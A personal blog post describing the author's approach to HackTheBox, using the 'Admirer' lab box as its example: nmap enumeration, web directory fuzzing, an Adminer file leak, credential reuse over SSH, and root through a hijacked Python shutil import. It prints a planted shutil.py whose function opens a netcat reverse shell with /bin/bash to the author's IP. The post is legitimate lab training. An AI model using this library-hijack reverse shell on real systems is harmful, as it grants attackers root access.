---
layout: post
title: My Approach to HackTheBox
---
I recently started investing more time into [HackTheBox](https://hacktehbox.eu). I do enjoy this more than CTFs because it seems to me to be more "life-like" and less like a, well, a CTF. In contracts to CTFs you are not faced with a single challenge, usually more or less well defined challenge, but are given an IP and the task of finding a user and a root flag.

To get there, you will have to search for open services, find which ones are exploitable, get a foothold,a shell, and finally through privilege escalation a root user. It does not specify if the challenge is to pwn a binary, crypto, reverse engineering or something else. In fact, it could be all of the above! {% aside Luckily, there are easy boxes, otherwise I would not get anywhere! %}

Here is how I approach a new HackTheBox... box.

# Step 0: Register on HackTheBox
First step is of course to register at HackTheBox. There is a small CTFish challenge on the registration page, but that should not be a problem. Afterwards you can run around wild on the platform.

"How does it work?" you might ask. {% aside At least I hope you ask, otherwise I am writing this for nothing... :( %} After you have logged in, you can hack any active box. With VIP, also the retired boxes can be started to hack on. The difference is that non-retired boxes give out points and no spoliers are allowed, whereas retired boxes do not give out ~~candy~~ points, but you will find loads of writeups on the internet about the boxes.

Once you have chosen your target, start a VM (seriously, work in a VM!), download the OpenVPN connection pack and connect to the HackTheBox network. So now the fun can begin!

# Step 1: Enumeration
   > Enumeration is key!

*--- Probably everyone. At least everyone I know. But I also only know strange people...*

Now you should probably test your connection, because we are dealing with computers, and computers are always right, we are just not capable of talking to them correctly. So run a quick ping against your target machine. Pings should always be enabled on HackTheBox machines, because everyone knows talking to computers is hard. If this does not work, then either the VPN is not connected (HackTheBox will show you on the webpage if a VPN is connected) or you did not start the box.

## NMAP is your friend
As a first step, NMAP is your friend. Run NMAP against the target IP. I usually run it like this:

```bash
$ nmap -T4 -p- -A -o nmap.out 10.10.10.187
# Nmap 7.80 scan initiated Sun May  3 16:40:06 2020 as: nmap -T3 -p- -A -o nmap.out 
Nmap scan report for 10.10.10.187
Host is up (0.041s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/3%OT=21%CT=1%CU=39210%PV=Y%DS=2%DC=T%G=Y%TM=5EAEE64E
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=8)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT      ADDRESS
1   39.68 ms 10.10.14.1
2   39.03 ms 10.10.10.187

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May  3 16:42:06 2020 -- 1 IP address (1 host up) scanned in 120.93 seconds
```

This is quite a bit of output! But the import thing is that we have port 21 (ftp), 22 (ssh) and 80 (Apache) open. This is our starting point. From one of those three, we try to get the first step done: Getting a foothold.

A good ressource if you are unsure what you can do with these ports is [HackTricks](https://book.hacktricks.xyz/). Let's look at one port after the other.

## FTP
Not very interesint right now, as anonymous login is disabled. NMAP would tell us otherwise. We can also check via `ftp 10.10.10.189` with username and password `anonymous`. So we first have to get some credential to to any thing with.

## SSH
SSH I usually skip without a credential. This is most likely not the way to go.

## Apache
Here it gets interesting. The attack surface of a webserver is **huge**. I don't even mean Apache itself, but all the things running on it. And often it is written by one person, as hobby, while caring for two kids and seven dogs. So they have not slept for a long time and are sustained by coffee and hope. I guess you get the point. The code quality is usually really, really poor, and reviews and just a dream.

There a few things I always try to do when seeing a webserver. First is using something like [ffuf](https://github.com/ffuf/ffuf) to fuzz for additional, hidden directories or files. For the wordlist, I rely heavily on the raft-lists from (SecLists)[https://github.com/danielmiessler/SecLists]. I also usually check if for the extension in use. So is there an `index.html` or an `index.php`? That will also go into the scan as additional extensions. I often also add `.txt` as another extension.

Another thing is to look for hostnames. For example, there might be an email address `contact@admirer.htb`, which hints that maybe the webserver will serve a different page when calling with `admirer.htb` instead of the IP. Just add a new entry in `/etc/hosts`, and you can connect this way.

Further, check the source code, either it spills the beans on what it is running (Wordpress for example), or you find other goodies in there. If you can detect what is used, use `searchsploit` (contained within Kali) do search for known exploits. Otherwise googling for it also works.

# Step 2: Getting Code Execution On The Box

Here it is even easier, because nmap already looks at `robots.txt` and shows us that the is a sub directory `admin-dir`. And because everything is very recursive, we can also run an `ffuf` against the subdirectory. If we do this, we find a few interesting files: `contacts.txt`, `credentials.txt`, `adminer.php`, `info.php` and `phptest.php`.

## Adminer
Now googling around for `adminer`, you can find a known [remote code execution vulnerability](https://medium.com/@xy83rx/admirer-walkthrough-3b4dc128f62c). Following those steps, we can leak the file `/var/www/html/index.php`. At least on Linux, it is a pretty good guess that `index.php` is in `/var/www/html`. It is also a safe bet that a database password is stored there, or at least it should point us to the file where it is actually stored. In this box, it is in index.php.

With that we have reached the first big milestone: Remote Code Execution!

# Step 3: Getting A User Shell
But actually, in this case, it is even better, as with these credentials we can login to SSH as well. This is an import lesson: Always try all credentials everywhere!

And with that, we have reached another big milestone: A user shell and a user flag!

This is just an example of how to get to code execution and to a shell. For example, we also have an ftp user and password, but in this case, it doesn't help. Sometimes, things are just rabbit holes that you will fall through. But you are not a rabbit and can crawl out of it again and restart. {%aside He realizes that rabbits can step out of it as well? %}

# Step 4: Privilege Escalation
From user to root is also a very versatile endevaor. First thing I would always try is to run something like [linPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS). This searches for a lot of interesting things that you can potentially use for privilege escalation.

On this particular box there are a few things put together. One is `sudo -l` (which you should always run for each user at least once) shows that a script under `/opt/scripts/admin_tasks.py` can be run with sudo. `sudo -l` is probably one of two main ways to escalate privileges on HackTheBox, besides SUID binaries. So that was not yet the trick to get this to run, that would be too easy.

When looking at that script, it runs `/opt/scripts/backup.py`. When looking at `backup.py` in turn, we can see that it imports `from shutil import make_archive` and then later calls `make_archive`. Normally, this would use whatever it finds on the Python path, so whatever was installed with `pip`. *Except* that I said "on the Python path". The current directory is also on the Python path. And if there is a file called `shutil.py`, Python will load that file with the import and call make_archive on that file. So if we place a method make_archive in there which gives us a shell. Which is what I did:

*shutil.py*
```python
import os

def make_archive(a, b, c):
	os.system("nc 10.10.14.23 9001 -e /bin/bash")
```

And with that, we have reached the last milestone, a root shell and the root flag!

## Other Ways to Get Root
There are quite a few other ways to get to root I encountered. Sometimes, the root password is somewhere in the file system. Sometimes we can find a hash that we have to crack. Sometimes there is a SUID binary to exploit. Sometimes we can run docker or lxc containers to get root. There are many, many ways to achieve that goal, and it is quite box specific. Just look at what linPEAS all prints out. This might all be relevant for privilege escalation.

# What About Windows
Mostly, Windows boxes require a bit a different approach. Enumeration is still key, but it requires more tools to interact specifically with the Windows ecosystem (like Active Directory, file shares, Windows Remoting, psexec, etc). So everything is usually slighty different. But sometimes, you also come across a Windows box that just relies on a webserver.

But especially privilege escalations on Windows are sometimes really hard, until you know the trick.
